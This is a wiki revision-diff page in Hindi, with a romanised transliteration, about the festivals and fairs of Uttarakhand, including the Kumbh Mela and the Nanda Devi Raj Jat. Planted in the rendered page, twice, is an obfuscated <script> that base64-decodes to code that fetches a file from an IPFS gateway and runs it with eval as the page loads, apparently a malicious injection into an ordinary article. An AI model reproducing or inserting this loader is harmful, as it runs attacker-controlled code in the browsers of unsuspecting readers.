Difference between revisions of "उत्तराखण्ड की संस्कृति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
[[उत्तराखण्ड]] राज्य के अधिकांश त्योहार और अवकाश [[हिन्दू]] [[पंचांग]] पर आधारित हैं। उत्तराखण्ड के कुछ महत्वपूर्ण हिन्दू त्योहारों और अवकाशों में बुराई के प्रतीक [[रावण]] पर [[राम]] की विजय के उपलक्ष्य में मनाया जाने वाला [[दशहरा]]; धन की देवी [[लक्ष्मी]] को समर्पित [[दीपावली]]; भगवान [[शिव]] की आराधना का दिन [[शिवरात्रि]]; रंगों का त्योहार [[होली]] और भगवान [[कृष्ण]] के जन्म के उपलक्ष्य में मनाई जाने वाली [[जन्माष्टमी]] शामिल हैं। अल-हुसैन बिन अली का शहीदी दिवस [[मुहर्रम]]; उपवास (रोज़े) रखने का महीना [[रमज़ान]]; और धर्म वैधानिक त्योहार [[ईद]] राज्य में मनाए जाने वाले मुसलमानों के कुछ प्रमुख त्योहारों में से हैं। [[बुद्ध पूर्णिमा]], [[महावीर जयंती]], [[गुरु नानक जयंती]] और क्रिसमस [[बौद्ध|बौद्धों]], [[जैन|जैनों]], [[सिक्ख|सिक्खों]] और ईसाईयों के महत्वपूर्ण त्योहार हैं, लेकिन हर जाति-धर्म के लोगों द्वारा मनाए जाते हैं। इनके अलावा गाँव-विशेष में मनाए जाने वाले छोटे-छोटे त्योहार भी हैं। राज्य में हर साल सैकड़ों मेले भी लगते हैं।
+
[[उत्तराखण्ड]] राज्य के अधिकांश त्योहार और अवकाश [[हिन्दू]] [[पंचांग]] पर आधारित हैं। उत्तराखण्ड के कुछ महत्त्वपूर्ण हिन्दू त्योहारों और अवकाशों में बुराई के प्रतीक [[रावण]] पर [[राम]] की विजय के उपलक्ष्य में मनाया जाने वाला [[दशहरा]]; धन की देवी [[लक्ष्मी]] को समर्पित [[दीपावली]]; भगवान [[शिव]] की आराधना का दिन [[शिवरात्रि]]; रंगों का त्योहार [[होली]] और भगवान [[कृष्ण]] के जन्म के उपलक्ष्य में मनाई जाने वाली [[जन्माष्टमी]] शामिल हैं। अल-हुसैन बिन अली का शहीदी दिवस [[मुहर्रम]]; उपवास (रोज़े) रखने का महीना [[रमज़ान]]; और धर्म वैधानिक त्योहार [[ईद]] राज्य में मनाए जाने वाले मुसलमानों के कुछ प्रमुख त्योहारों में से हैं। [[बुद्ध पूर्णिमा]], [[महावीर जयंती]], [[गुरु नानक जयंती]] और क्रिसमस [[बौद्ध|बौद्धों]], [[जैन|जैनों]], [[सिक्ख|सिक्खों]] और ईसाईयों के महत्त्वपूर्ण त्योहार हैं, लेकिन हर जाति-धर्म के लोगों द्वारा मनाए जाते हैं। इनके अलावा गाँव-विशेष में मनाए जाने वाले छोटे-छोटे त्योहार भी हैं। राज्य में हर साल सैकड़ों मेले भी लगते हैं।
 
*विश्व प्रसिद्ध [[कुंभ]] मेला/अर्द्ध कुंभ मेला [[हरिद्वार]] में प्रति बारहवें/छठे वर्ष के अंतराल में मनाया जाता है।
 
*विश्व प्रसिद्ध [[कुंभ]] मेला/अर्द्ध कुंभ मेला [[हरिद्वार]] में प्रति बारहवें/छठे वर्ष के अंतराल में मनाया जाता है।
 
* अन्य प्रमुख मेले/त्योहार हैं-  
 
* अन्य प्रमुख मेले/त्योहार हैं-  
Line 13: Line 13:
 
#पीरान कलियार (रूड़की), और  
 
#पीरान कलियार (रूड़की), और  
 
#नंदा देवी राज जात यात्रा हर बारहवें वर्ष होती है।
 
#नंदा देवी राज जात यात्रा हर बारहवें वर्ष होती है।
 
  
 
{{प्रचार}}
 
{{प्रचार}}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 23: Line 22:
 
{{भारत की संस्कृति}}
 
{{भारत की संस्कृति}}
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
 +
[[Category:संस्कृति कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 11:24, 27 August 2011

uttarakhand rajy ke adhikaansh tyohar aur avakash hindoo panchaang par adharit haian. uttarakhand ke kuchh mahattvapoorn hindoo tyoharoan aur avakashoan mean buraee ke pratik ravan par ram ki vijay ke upalakshy mean manaya jane vala dashahara; dhan ki devi lakshmi ko samarpit dipavali; bhagavan shiv ki aradhana ka din shivaratri; rangoan ka tyohar holi aur bhagavan krishna ke janm ke upalakshy mean manaee jane vali janmashtami shamil haian. al-husain bin ali ka shahidi divas muharram; upavas (roze) rakhane ka mahina ramazan; aur dharm vaidhanik tyohar eed rajy mean manae jane vale musalamanoan ke kuchh pramukh tyoharoan mean se haian. buddh poornima, mahavir jayanti, guru nanak jayanti aur krisamas bauddhoan, jainoan, sikkhoan aur eesaeeyoan ke mahattvapoorn tyohar haian, lekin har jati-dharm ke logoan dvara manae jate haian. inake alava gaanv-vishesh mean manae jane vale chhote-chhote tyohar bhi haian. rajy mean har sal saik doan mele bhi lagate haian.

  • vishv prasiddh kuanbh mela/arddh kuanbh mela haridvar mean prati barahavean/chhathe varsh ke aantaral mean manaya jata hai.
  • any pramukh mele/tyohar haian-

[[chitr:Ram-Jhula-Bridge.jpg|thumb|right|ram jhoola, rrishikesh
Ram Jhula, Rishikesh]]

  1. devidhura mela (chanpavat),
  2. poornagiri mela (chanpavat),
  3. nanda devi mela (almo da),
  4. gauchar mela (chamoli),
  5. vaishakhi (uttarakashi),
  6. magh mela (uttarakashi),
  7. uttarayani mela (bageshvar),
  8. vishu mela (jaunasar bavar),
  9. piran kaliyar (roo daki), aur
  10. nanda devi raj jat yatra har barahavean varsh hoti hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>